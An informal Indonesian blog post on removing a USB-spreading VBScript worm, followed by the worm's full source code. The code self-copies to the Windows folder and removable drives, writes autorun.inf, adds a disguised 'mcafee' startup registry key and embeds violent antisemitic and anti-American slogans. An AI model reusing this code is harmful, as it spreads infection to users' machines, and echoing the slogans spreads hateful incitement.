aku telah berhasil membunuh virus yang rese ini yang mungkin menggagu banget…….(^_^) setiap mecolokan flashdisk ke komputer muncul lagi-muncul lagi tuh virus….. cape deh… virus ini mengcopykan dirinya…. disetiap drive komputer misal drive C: , drive D ….dll…. dan flashdisk pun bisa jadi masuk. virus ini mengcopykan dirinya ada dua file yaitu file sfx.dll.vbs (4 Kb) dan autorun.inf (4 kb). kita bisa lihat virus ini dengan mengaktifkan Folder Options di Windows Explorer klik Tolls—>Folder Options –> View –>Hidden Files and Folders –> Show Hidden Files and Folders–>Hide Extensions For Known File Types…………
setelah itu dilakukan maka kita bisa lihat di drive C: atau drive D: file virus akan tampak sfx.dll.vbs dan autorun.inf. klo kita delete file tersebut dia tidak akan mati karna dia akan mengcopykan dirinya kambali. maka dari itu kita melakukan dengan cara save mode kamputer anda lalu masuk ke administrator. untuk mempercepat pencarian kita
lakukan dengan Search file virus tersebut ke semua Drive komputer agar semua dapat. setelah file tsb dapat semua blok semua file tsb delete dengan menekan tombol Shift + Delete agar mati permanen…..
selamat mencoba….
mohon maaf apabila gaya bahaya yang saya gunakan tidak formal atau sulit untuk dicerna..
Virus ini dibuat menggunakan bahasa pemprograman Visual Basic :
Sintak virus ini:
on error resume next
Rem 121206, do u still remember dis day us_3?
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe sfx.dll.vbs”
Set fs = CreateObject(”Scripting.FileSystemObject”)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
src=src&text.readline
src = src & vbCrLf
Loop
Do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & “\sfx.dll.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & “\sfx.dll.vbs”, 2, True)
tf.write src
tf.Close
Set tf = fs.getfile(winpath & “\sfx.dll.vbs”)
tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> “A:” Then
Set tf = fs.getfile(flashdrive.Path & “\sfx.dll.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\sfx.dll.vbs”, 2, True)
tf.write src
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\sfx.dll.vbs”)
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\autorun.inf”, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 39
End If
Next
Set rg = CreateObject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee”,winpath & “\sfx.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”, “Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]”
rg.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1
Set sd = CreateObject(”Wscript.shell”)
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
……………..
mungkin si pembuat buat virus ini sedang berusaha menyampaikan pesan tetapi
yang dia lakukan dengan cara yang salah membuat orang lain menjadi resah gara-gara virus ini.
….Trima kasih tetap semangat……(^_^)